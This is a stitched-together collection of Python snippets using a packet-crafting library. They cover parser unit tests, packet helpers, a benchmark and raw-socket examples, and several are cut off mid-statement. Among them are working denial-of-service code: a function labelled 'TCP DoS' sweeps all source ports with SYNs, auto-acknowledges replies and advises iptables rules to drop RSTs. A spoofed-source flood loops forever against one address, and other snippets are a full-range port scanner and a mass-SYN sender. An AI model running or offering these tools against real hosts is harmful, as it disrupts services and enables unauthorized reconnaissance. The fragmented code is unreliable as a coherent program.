def buildtcp(): # Ethernet header eth = ethernet.Ethernet() eth.src = b"\x00\x0c\x29\xdf\xe3\xc0" eth.dst = b"\x00\x0c\x29\x29\x85\xd2" eth.type = ethernet.ETH_TYPE_IP # IP header ipp = ip.IP() ipp.src = socket.inet_aton("172.16.13.165") ipp.dst = socket.inet_aton("172.16.13.162") ipp.p = ip.IP_PROTO_TCP # TCP header tcpp = tcp.TCP() tcpp.sport = 60001 tcpp.dport = 80 tcpp.flags = tcp.TH_SYN ipp.data = tcpp ipp.len = len(str(ip)) ipp.id = 1 tcpp._TCP__calc_sum() ipp._IP__calc_sum() eth.data = ipp # open sockets using the socket handler #sock_l2 = SocketHndl(iface_name="eth1", mode=SocketHndl.MODE_LAYER_2) # send raw bytes #sock_l2.send(eth.bin()) #print(eth.bin()) return eth.bin()
def test_tcp_packet_filter_and_parse_with_field_template_with_non_existing_field_first( marine_or_marine_pool: Union[Marine, MarinePool] ): src_mac = "00:00:00:12:34:ff" dst_mac = "00:00:00:ff:00:1e" src_ip = "21.53.78.255" dst_ip = "10.0.0.255" src_port = 16424 dst_port = 41799 bpf_filter = "ip" display_filter = "tcp" field_templates = {"macro.ip.src": ["ipv6.src", "ip.src"]} expected_output = { "macro.ip.src": src_ip, } packet = ( ethernet.Ethernet(src_s=src_mac, dst_s=dst_mac) + ip.IP(src_s=src_ip, dst_s=dst_ip) + tcp.TCP(sport=src_port, dport=dst_port) ) general_filter_and_parse_test( marine_or_marine_pool=marine_or_marine_pool, packet=packet.bin(), packet_encapsulation=encap_consts.ENCAP_ETHERNET, bpf_filter=bpf_filter, display_filter=display_filter, field_templates=field_templates, expected_passed=True, expected_output=expected_output, )
def tcp_packet(tcp_payload) -> bytes: packet = ( ethernet.Ethernet(src_s="00:00:00:12:34:ff", dst_s="00:00:00:ff:00:1e") + ip.IP(src_s="10.0.0.255", dst_s="21.53.78.255") + tcp.TCP( sport=16424, dport=41799, flags=tcp.TH_ACK, body_bytes=tcp_payload)) return packet.bin()
def test_filter_and_parse_without_filters( marine_or_marine_pool: Union[Marine, MarinePool] ): src_mac = "00:00:00:12:34:ff" dst_mac = "00:00:00:ff:00:1e" src_ip = "21.53.78.255" dst_ip = "10.0.0.255" src_port = 16424 dst_port = 41799 expected_output = { "eth.src": src_mac, "eth.dst": dst_mac, "ip.src": src_ip, "ip.dst": dst_ip, "tcp.srcport": src_port, "tcp.dstport": dst_port, } packet = ( ethernet.Ethernet(src_s=src_mac, dst_s=dst_mac) + ip.IP(src_s=src_ip, dst_s=dst_ip) + tcp.TCP(sport=src_port, dport=dst_port) ) general_filter_and_parse_test( marine_or_marine_pool=marine_or_marine_pool, packet=packet.bin(), packet_encapsulation=encap_consts.ENCAP_ETHERNET, bpf_filter=None, display_filter=None, field_templates=None, expected_passed=True, expected_output=expected_output, )
def _generate_zero_pkt(self, src_ip, src_port, dst_ip, dst_port, proto): assert proto == 6 zp = ethernet.Ethernet() + ip.IP(src_s=src_ip, dst_s=dst_ip) + tcp.TCP( sport=src_port, dport=dst_port, flags=24, body_bytes=bytearray(self.zpp)) return zp.bin()
def _make_syn_ack_packet(self, saddr, daddr, sport, dport, seq): packet = ip.IP(src_s=saddr, dst_s=daddr) + tcp.TCP( dport=dport, sport=sport, seq=seq, ack=seq + 1, flags=tcp.TH_SYN | tcp.TH_ACK, ) return packet.bin()
def _create_tcp_base_packets( conversation: Layer3Conversation) -> Tuple[Packet, Packet]: src_port, dst_port = _generate_port(), _generate_port() base_src_to_dst = (ethernet.Ethernet( src_s=conversation.src_mac, dst_s=conversation.dst_mac, type=ethernet.ETH_TYPE_IP, ) + ip.IP(p=ip.IP_PROTO_TCP, src_s=conversation.src_ip, dst_s=conversation.dst_ip) + tcp.TCP(sport=src_port, dport=dst_port)) base_dst_to_src = (ethernet.Ethernet( src_s=conversation.dst_mac, dst_s=conversation.src_mac, type=ethernet.ETH_TYPE_IP, ) + ip.IP(p=ip.IP_PROTO_TCP, src_s=conversation.dst_ip, dst_s=conversation.src_ip) + tcp.TCP(sport=dst_port, dport=src_port)) return base_src_to_dst, base_dst_to_src
def send_pkt(pkt_num): ips = [] for i in range(0, pkt_num): ips.append(str(random.randint(1, 254)) + '.' + str(random.randint(1, 254)) + '.' + str(random.randint(1, 254)) + '.' + str(random.randint(1, 254))) while True: for i in range(0, pkt_num): src_ip = ips[i] print('src ip : ' + src_ip) packet_ip = ip.IP(src_s=src_ip, dst_s="192.168.10.1") + tcp.TCP(dport=8888) psock = psocket.SocketHndl(mode=psocket.SocketHndl.MODE_LAYER_3, timeout=10) psock.send(packet_ip.bin(), dst=packet_ip.dst_s) time.sleep(0.001) psock.close()
def test_http_packet_filter_and_parse(marine_or_marine_pool: Union[Marine, MarinePool]): src_mac = "00:00:00:12:34:ff" dst_mac = "00:00:00:ff:00:1e" src_ip = "21.53.78.255" dst_ip = "10.0.0.255" src_port = 16424 dst_port = 80 http_type = "GET" uri = "/subtest/subsubtest" version = "HTTP/1.1" domain_name = "www.testwebsite.com" body = "random body \x09\xff\x00" bpf_filter = "ip" display_filter = "http" expected_output = { "eth.src": src_mac, "eth.dst": dst_mac, "ip.src": src_ip, "ip.dst": dst_ip, "tcp.srcport": src_port, "tcp.dstport": dst_port, "http.request.method": http_type, "http.request.uri": uri, "http.request.version": version, "http.host": domain_name, } packet = ( ethernet.Ethernet(src_s=src_mac, dst_s=dst_mac) + ip.IP(src_s=src_ip, dst_s=dst_ip) + tcp.TCP(sport=src_port, dport=dst_port) + http.HTTP( f"{http_type} {uri} {version}\r\nHost: {domain_name}\r\n\r\n{body}\r\n".encode() ) ) general_filter_and_parse_test( marine_or_marine_pool=marine_or_marine_pool, packet=packet.bin(), packet_encapsulation=encap_consts.ENCAP_ETHERNET, bpf_filter=bpf_filter, display_filter=display_filter, field_templates=None, expected_passed=True, expected_output=expected_output, )
def test_tcp_packet_filter_and_parse_with_multiple_different_field_templates( marine_or_marine_pool: Union[Marine, MarinePool] ): src_mac = "00:00:00:12:34:ff" dst_mac = "00:00:00:ff:00:1e" src_ip = "21.53.78.255" dst_ip = "10.0.0.255" src_port = 16424 dst_port = 41799 bpf_filter = "ip" display_filter = "tcp" first_field_templates = { "macro.ip.src": ["ip.src", "ipv6.src"], "macro.ip.dst": ["ip.dst", "ipv6.dst"], } second_field_templates = { "macro.ip.src": ["ip.src", "ipv6.src"], "macro.ip.dst": ["ip.dst", "ipv6.dst"], "macro.srcport": ["tcp.srcport", "udp.srcport"], "macro.dstport": ["tcp.dstport", "udp.dstport"], } third_field_templates = { "macro.ip.src": ["ip.src", "ipv6.src"], "macro.ip.dst": ["ip.dst", "ipv6.dst"], "macro.dstport": ["tcp.dstport", "udp.dstport"], } first_expected_output = { "eth.src": src_mac, "eth.dst": dst_mac, "macro.ip.src": src_ip, "macro.ip.dst": dst_ip, "tcp.srcport": src_port, "tcp.dstport": dst_port, } second_expected_output = { "eth.src": src_mac, "eth.dst": dst_mac, "macro.ip.src": src_ip, "macro.ip.dst": dst_ip, "macro.srcport": src_port, "macro.dstport": dst_port, } third_expected_output = { "eth.src": src_mac, "eth.dst": dst_mac, "macro.ip.src": src_ip, "macro.ip.dst": dst_ip, "tcp.srcport": src_port, "macro.dstport": dst_port, } packet = ( ethernet.Ethernet(src_s=src_mac, dst_s=dst_mac) + ip.IP(src_s=src_ip, dst_s=dst_ip) + tcp.TCP(sport=src_port, dport=dst_port) ) general_filter_and_parse_test( marine_or_marine_pool=marine_or_marine_pool, packet=packet.bin(), packet_encapsulation=encap_consts.ENCAP_ETHERNET, bpf_filter=bpf_filter, display_filter=display_filter, field_templates=first_field_templates, expected_passed=True, expected_output=first_expected_output, ) general_filter_and_parse_test( marine_or_marine_pool=marine_or_marine_pool, packet=packet.bin(), packet_encapsulation=encap_consts.ENCAP_ETHERNET, bpf_filter=bpf_filter, display_filter=display_filter, field_templates=second_field_templates, expected_passed=True, expected_output=second_expected_output, ) general_filter_and_parse_test( marine_or_marine_pool=marine_or_marine_pool, packet=packet.bin(), packet_encapsulation=encap_consts.ENCAP_ETHERNET, bpf_filter=bpf_filter, display_filter=display_filter, field_templates=third_field_templates, expected_passed=True, expected_output=third_expected_output, )
def reverse_address(self): """ reverse_address(...) should be overwritten to be able to reverse source/destination addresses (see ethernet.Ethernet) """ self.src, self.dst = self.dst, self.src # Parse from raw bytes # First layer (Layer 2) newproto_bytes = b"\x66" + b"AAAA" + b"BBBB" + b"\x00\x16" + b"\x00" + b"1234" + b"\x00A\x01B\x02C" # Next upper layer (Layer 3) ip_bytes = ip.IP().bin() # Layer above upper layer (Layer 4) tcp_bytes = tcp.TCP().bin() newproto_pkt = NewProtocol(newproto_bytes + ip_bytes + tcp_bytes) print() print(">>> Layers of packet:") print("Output all layers: %s" % newproto_pkt) print("Access some fields: 0x%X %s %s" % (newproto_pkt.type, newproto_pkt.src, newproto_pkt.dst)) print("Access next upper layer (IP): %s" % newproto_pkt.ip) print("A layer above IP: %s" % newproto_pkt.ip.tcp) print("Same as above: %s" % newproto_pkt[tcp.TCP]) # Create new Packet by defining every single header and adding higher layers newproto_pkt = NewProtocol( type=0x66, src=b"AAAA", dst=b"BBBB", hlen=0x11, yolo=b"1234", options=[b"\x00A\x01B\x02C"]) +\ ip.IP() +\
arpreq = ethernet.Ethernet(src_s="12:34:56:78:90:12", type=ethernet.ETH_TYPE_ARP) +\ arp.ARP(sha_s="12:34:56:78:90:12", spa_s="192.168.0.2", tha_s="12:34:56:78:90:13", tpa_s="192.168.0.1") psock.send(arpreq.bin()) # send ICMP request icmpreq = ethernet.Ethernet(src_s="12:34:56:78:90:12", dst_s="12:34:56:78:90:13", type=ethernet.ETH_TYPE_IP) +\ ip.IP(p=ip.IP_PROTO_ICMP, src_s="192.168.0.2", dst_s="192.168.0.1") +\ icmp.ICMP(type=8) +\ icmp.ICMP.Echo(id=1, ts=123456789, body_bytes=b"12345678901234567890") psock.send(icmpreq.bin()) # send TCP SYN tcpsyn = ethernet.Ethernet(src_s="12:34:56:78:90:12", dst_s="12:34:56:78:90:13", type=ethernet.ETH_TYPE_IP) +\ ip.IP(p=ip.IP_PROTO_TCP, src_s="192.168.0.2", dst_s="192.168.0.1") +\ tcp.TCP(sport=12345, dport=80) psock.send(tcpsyn.bin()) # send UDP data udpcon = ethernet.Ethernet(src_s="12:34:56:78:90:12", dst_s="12:34:56:78:90:13", type=ethernet.ETH_TYPE_IP) +\ ip.IP(p=ip.IP_PROTO_UDP, src_s="192.168.0.2", dst_s="192.168.0.1") +\ udp.UDP(sport=12345, dport=80) udpcon[udp.UDP].body_bytes = b"udpdata" psock.send(udpcon.bin()) psock.close() # # send and receive packets on layer 3 (assumes running HTTP-server on port 80) # packet_ip = ip.IP(src_s="127.0.0.1", dst_s="127.0.0.1") + tcp.TCP(dport=80) psock = psocket.SocketHndl(mode=psocket.SocketHndl.MODE_LAYER_3, timeout=10)
def tcp_cb(pargs): """TCP DoS""" iptables_rules_info = """ iptables -I OUTPUT -p tcp --tcp-flags ALL RST,ACK -j DROP iptables -I OUTPUT -p tcp --tcp-flags ALL RST -j DROP iptables -I INPUT -p tcp --tcp-flags ALL RST -j DROP """ logger.info("For best performance set set these rules: %s", iptables_rules_info) pkt_tcp_syn = ethernet.Ethernet(dst_s=pargs.mac_dst, src_s=pargs.mac_src) +\ ip.IP(src_s=pargs.ip_src, dst_s=pargs.ip_dst, p=ip.IP_PROTO_TCP) +\ tcp.TCP(sport=12345, dport=pargs.port_dst) # Use raw sockets to circumvent network stack psock_send = psocket.SocketHndl(iface_name=pargs.iface_name, mode=psocket.SocketHndl.MODE_LAYER_2) psock_rcv = psocket.SocketHndl(iface_name=pargs.iface_name, mode=psocket.SocketHndl.MODE_LAYER_2) is_running = True def answer_cycler(): def filter_cb(pkt): try: return pkt.ip.tcp.flags == tcp.TH_SYN | tcp.TH_ACK except Exception as ex: #logger.warning(ex) pass return False while is_running: try: pkt_rsp = psock_rcv.recvp(filter_match_recv=filter_cb)[0] #logger.debug("got SYN,ACK: %r", pkt_rsp) except IndexError: logger.debug("no packets..") continue pkt_rsp.reverse_all_address() tcp_l = pkt_rsp.ip.tcp tcp_l.flags = tcp.TH_ACK tcp_l.seq, tcp_l.ack = tcp_l.ack, tcp_l.seq tcp_l.ack += 1 psock_rcv.send(pkt_rsp.bin()) answer_thread = threading.Thread(target=answer_cycler) answer_thread.start() randrange = random.randrange tcp_l = pkt_tcp_syn.ip.tcp logger.debug("sending...") input = 0x31CE #for cnt in range(pargs.count): for sport in range(0, 65536): tcp_l.seq = randrange(1000, 123123) tcp_l.sport = sport ^ input psock_send.send(pkt_tcp_syn.bin()) print("\rsent %d syn" % sport, end="") #time.sleep(0.0001) print() logger.debug("finished") is_running = False time.sleep(999) psock_send.close() psock_rcv.close()
import time from pypacker.layer12.ethernet import Ethernet from pypacker.layer3 import ip from pypacker.layer4 import tcp from pypacker.layer567 import http import dpkt pkt_eth_ip_tcp = Ethernet() + ip.IP() + tcp.TCP(dport=80) http_l = http.HTTP(startline=b"GET / HTTP/1.1", hdr=[(b"header1", b"value1")], body_bytes=b"Content123") pkt_eth_ip_tcp += http_l pkt_eth_ip_tcp_bts = pkt_eth_ip_tcp.bin() LOOP_CNT = 100000 print( "or = original results (Intel Core2 Duo CPU @ 1,866 GHz, 2GB RAM, Python v3.3)" ) print("nr = new results on this machine") print("rounds per test: %d" % LOOP_CNT) print(">>> testing pypacker parsing speed") t_start = time.time() for cnt in range(LOOP_CNT): pkt1 = Ethernet(pkt_eth_ip_tcp_bts) # dpkt does not parse TCP content but pypacker does
lowest_layer=ethernet.Ethernet, max_amount=1) except: print("stopping receive cycler") break thread_rcv = threading.Thread(target=rcv_cycler, args=[sock_rcv]) thread_rcv.start() print("starting to scan") for port in range(0, 0xFFFF + 1): print("\rPinging TCP port %d" % port, end="") while not open_ports.empty(): port_open = open_ports.get() print("\nTCP Port %d on %s seems to be open" % (port_open, IP_DST)) pkt_send = ethernet.Ethernet(dst_s=MAC_DST, src_s=MAC_SRC) +\ ip.IP(src_s=IP_SRC, dst_s=IP_DST) +\ tcp.TCP(sport=PORT_SRC, dport=port, seq=TCP_SEQ) sock_send.send(pkt_send.bin()) print() print("waiting some seconds to receive delayed responses") time.sleep(2) sock_rcv.close() sock_send.close()
arpreq = ethernet.Ethernet(src_s="12:34:56:78:90:12", type=ethernet.ETH_TYPE_ARP) +\ arp.ARP(sha_s="12:34:56:78:90:12", spa_s="192.168.0.2", tha_s="12:34:56:78:90:13", tpa_s="192.168.0.1") psock.send(arpreq.bin()) # send ICMP request icmpreq = ethernet.Ethernet(src_s="12:34:56:78:90:12", dst_s="12:34:56:78:90:13", type=ethernet.ETH_TYPE_IP) +\ ip.IP(p=ip.IP_PROTO_ICMP, src_s="192.168.0.2", dst_s="192.168.0.1") +\ icmp.ICMP(type=8) +\ icmp.ICMP.Echo(id=1, ts=123456789, body_bytes=b"12345678901234567890") psock.send(icmpreq.bin()) # send TCP SYN tcpsyn = ethernet.Ethernet(src_s="12:34:56:78:90:12", dst_s="12:34:56:78:90:13", type=ethernet.ETH_TYPE_IP) +\ ip.IP(p=ip.IP_PROTO_TCP, src_s="192.168.0.2", dst_s="192.168.0.1") +\ tcp.TCP(sport=12345, dport=80) psock.send(tcpsyn.bin()) # send UDP data udpcon = ethernet.Ethernet(src_s="12:34:56:78:90:12", dst_s="12:34:56:78:90:13", type=ethernet.ETH_TYPE_IP) +\ ip.IP(p=ip.IP_PROTO_UDP, src_s="192.168.0.2", dst_s="192.168.0.1") +\ udp.UDP(sport=12345, dport=80) udpcon[udp.UDP].body_bytes = b"udpdata" psock.send(udpcon.bin()) psock.close() except socket.timeout as e: print("timeout!") except socket.error as e: print("you need to be root to execute the raw socket-examples!") """ >>> Code snippets
def _generate_ack(self, src_ip, src_port, dst_ip, dst_port, proto): assert proto == 6 ack = ethernet.Ethernet() + ip.IP( src_s=dst_ip, dst_s=src_ip) + tcp.TCP( sport=dst_port, dport=src_port, flags=16) return ack.bin()
MAC_DST = "24:65:11:85:E9:AC" IP_SRC = "192.168.178.26" FILE_IP_DST = sys.argv[2] print("destination IP addresses file: %s" % FILE_IP_DST) IP_DST = open(FILE_IP_DST, "r").read().split("\n")[:-1] print("amount addresses: %d" % len(IP_DST)) REPITITIONS = int(sys.argv[1]) print("repititiona: %d" % REPITITIONS) psock_req = psocket.SocketHndl(iface_name=IFACE, mode=psocket.SocketHndl.MODE_LAYER_2) tcp_syn = ethernet.Ethernet(dst_s=MAC_DST, src_s=MAC_SRC) +\ ip.IP(src_s=IP_SRC, dst_s="127.0.0.1", p=ip.IP_PROTO_TCP) +\ tcp.TCP(sport=12345, dport=1337) print("%r" % tcp_syn) ip = tcp_syn.ip tcp = tcp_syn.ip.tcp randrange = random.randrange for x in range(REPITITIONS): if x % 10000 == 0: print("sent %d" % x) ip_dst_str = IP_DST[randrange(0, len(IP_DST))] try: ip.dst_s = ip_dst_str except: print("could not parse: %s" % ip_dst_str) continue